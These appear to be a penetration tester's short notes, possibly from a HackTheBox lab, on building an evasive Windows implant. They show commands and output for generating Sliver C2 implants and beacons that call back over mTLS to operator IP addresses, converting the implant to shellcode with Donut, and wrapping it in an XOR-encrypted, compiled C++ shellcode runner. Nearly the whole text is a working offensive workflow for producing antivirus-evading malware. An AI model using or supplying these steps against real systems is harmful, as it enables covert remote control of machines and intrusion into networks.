shellcode runner ( final step )
➜ shellcoderunner git:(main) ✗ python3 xor.py a.bin mysecretkey --compile [+] NTAPI-based C++ runner saved to shellcode_runner.cpp [*] Compiling shellcode_runner.cpp to runner.exe... [+] Compilation successful: runner.exe
shellcode runner from: https://github.com/lineeralgebra/shellcoderunner
1st generate the payload from Sliver-C2
sliver > generate --mtls 10.8.0.8 --os windows --arch amd64 --format exe -G --skip-symbols [*] Generating new windows/amd64 implant binary [!] Symbol obfuscation is disabled [*] Build completed in 2s [*] Implant saved to /home/bolke/STABLE_YAK.exe sliver >
or a beacon
sliver > generate beacon --mtls 10.10.14.114 --os windows --arch amd64 --format bin [*] Generating new windows/amd64 beacon implant binary (1m0s) [*] Symbol obfuscation is enabled [*] Build completed in 21s [*] Implant saved to /home/puck/htb/rustykey/GLEAMING_DORY.exe
2nd Donut the file
┌──(bolke㉿bolke)-[~/donut_v0.9.3]
└─$ ./donut STABLE_YAK.exe
[ Donut shellcode generator v0.9.3
[ Copyright (c) 2019 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "STABLE_YAK.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : x86+amd64
[ AMSI/WDLP : continue
[ Shellcode : "loader.bin"
┌──(bolke㉿bolke)-[~/donut_v0.9.3]
..